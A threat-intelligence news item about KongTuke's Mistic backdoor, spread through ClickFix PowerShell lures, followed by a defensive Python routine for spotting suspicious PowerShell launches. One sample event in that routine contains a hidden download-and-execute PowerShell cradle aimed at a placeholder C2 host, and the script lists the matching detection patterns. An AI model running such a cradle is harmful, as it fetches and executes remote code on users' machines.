A new backdoor named Mistic has been identified in campaigns targeting organizations across insurance, education, IT, and professional services, marking a significant evolution in the capabilities of initial access broker (IAB) KongTuke. Security researchers report this development signals a strategic shift from reselling generic access to providing custom-built, stealthy persistence for downstream criminal operations.

Analysis from Symantec and the Carbon Black Threat Hunter Team, reported by The Hacker News, links the campaign to KongTuke and notes it has been active since at least April 2026. The broad targeting suggests the primary motive is to establish and sell persistent access, likely to threat actors such as ransomware operators.

The attack chain begins with a ClickFix social engineering lure, tricking users into executing a malicious PowerShell script. This script downloads and deploys the Mistic backdoor, also tracked as MLTBackdoor. For stealth, the malware exclusively uses HTTPS for command-and-control (C2) communications, allowing it to blend with legitimate encrypted web traffic and evade standard network monitoring.

The deployment of a custom backdoor is a key indicator of IAB specialization. Rather than offering one-time access, KongTuke is now providing a more resilient foothold designed for long-term, undetected presence within a network. This aligns with a growing trend of increased sophistication and partnership models within cybercriminal ecosystems.

Defenders are urged to monitor for anomalous PowerShell execution, particularly from user-initiated sessions, as a critical detection layer. Proactively blocking the published Indicators of Compromise (IOCs) related to KongTuke’s known infrastructure can also disrupt these campaigns. The emergence of Mistic underscores the continuous escalation in the battle between offensive persistence and defensive visibility.
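As an added illustration of the detection layer described above (example code, not from the Symantec/Carbon Black report): a small triage routine that flags PowerShell launched from a user-initiated parent process when its command line carries several ClickFix-style indicators. The event field names, the assumption that a user-pasted command has Explorer as its parent, and the sample events are all constructed for this example.

```python
import re
from typing import Dict, List

# Constructed process-creation events (not real telemetry); field names are assumptions
EVENTS: List[Dict[str, str]] = [
    {"host": "WS01", "user": "jdoe", "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "powershell -w hidden -nop -ep bypass -c \"iex (iwr 'https://c2.example.invalid/s')\""},
    {"host": "WS02", "user": "asmith", "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "powershell -File C:\\Scripts\\backup.ps1"},
    {"host": "WS03", "user": "bchen", "parent": "explorer.exe", "image": "pwsh.exe",
     "cmd": "pwsh -NoProfile -Command Get-Date"},
]

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
# Assumption: a command pasted into the Run box or a desktop shortcut has Explorer as parent
USER_INITIATED_PARENTS = {"explorer.exe"}

# Command-line traits typical of copy/paste lures; each one alone is weak, several together are not
INDICATORS = [
    (re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s", re.I), "encoded command"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(?:nop|noprofile)\b", re.I), "profile suppressed"),
    (re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), "inline expression evaluation"),
    (re.compile(r"\b(?:iwr|irm|curl|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I),
     "download cradle"),
    (re.compile(r"https?://", re.I), "embedded URL"),
]

def indicators_for(cmd: str) -> List[str]:
    """Return the names of all indicators present in one command line."""
    return [name for pattern, name in INDICATORS if pattern.search(cmd)]

def is_suspicious(event: Dict[str, str], threshold: int = 2) -> bool:
    """Flag PowerShell started from a user-initiated parent with at least `threshold` indicators."""
    if event["image"].lower() not in POWERSHELL_IMAGES:
        return False
    if event["parent"].lower() not in USER_INITIATED_PARENTS:
        return False
    return len(indicators_for(event["cmd"])) >= threshold

def triage(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Produce one alert per suspicious event, carrying the matched indicators for the analyst."""
    return [{"host": e["host"], "user": e["user"], "reasons": indicators_for(e["cmd"])}
            for e in events if is_suspicious(e)]

if __name__ == "__main__":
    for alert in triage(EVENTS):
        print(alert)
```

The threshold keeps an ordinary `-NoProfile` launch from alerting while the hidden, policy-bypassing download-and-evaluate one-liner is surfaced with every matched trait listed.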
